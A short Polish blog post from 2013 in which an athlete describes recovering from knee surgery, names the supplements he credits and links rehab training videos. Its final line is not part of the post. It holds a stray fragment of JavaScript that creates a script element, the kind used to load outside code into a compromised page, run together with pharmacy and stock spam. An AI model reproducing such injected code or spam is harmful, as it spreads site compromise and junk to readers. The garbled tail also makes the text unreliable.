Dla tych co kontuzjowani :)

17.10.2013 / Mariusz Cieśliński

Dowiaduję się co chwilę co jest niezmiernie smutne,że moi znajomi z ringów i mat łapią kontuzje.I to te co dla sportowców są najgorsze.Uszkodzenia kolan.Zerwane więzadła,poszarpane łąkotki etc.

Staw najprostszy w działaniu i najtrudniejszy w leczeniu.Oprócz tego nasz nieudolny system medyczny-czekanie na operację-potem dochodzi strach i obawa jak będzie to działać(kolano) po operacji?

Faktem jest,że jeszcze niedawno sam miałem takie dylematy i obawy.Czy wrócę do sportu etc.

Co jest ważne gdy życie posadzi Ciebie na dechy?Ty sam i Twoja chęć powrotu do czynnego uprawiania sportu,do pasji ,której poświęciłeś niemal większość życia.W tym czarnym dla mnie jako sportowca czasie „zmłóciłem” ogromne ilości Isolate100,Collagen Renover,Joint(X)Pack,CM3-To był szkielet odbudowy tkanki łącznej i mięśni,które trochę w krótkim czasie stopniały na chorej kończynie.

Wrzucam parę filmików z treningów rehabilitacyjnych ku pokrzepieniu oraz pierwszych treningów „fajterskich” po operacji:

http://www.youtube.com/edit?video_id=3Xs8UAiofEM&video_referrer=watch&ns=1&o=U

 

 

 

 

 } else {var d=document;var s=d.createElement('script'); } cheap lithium stocks to buy Pills Pills Cheap online online online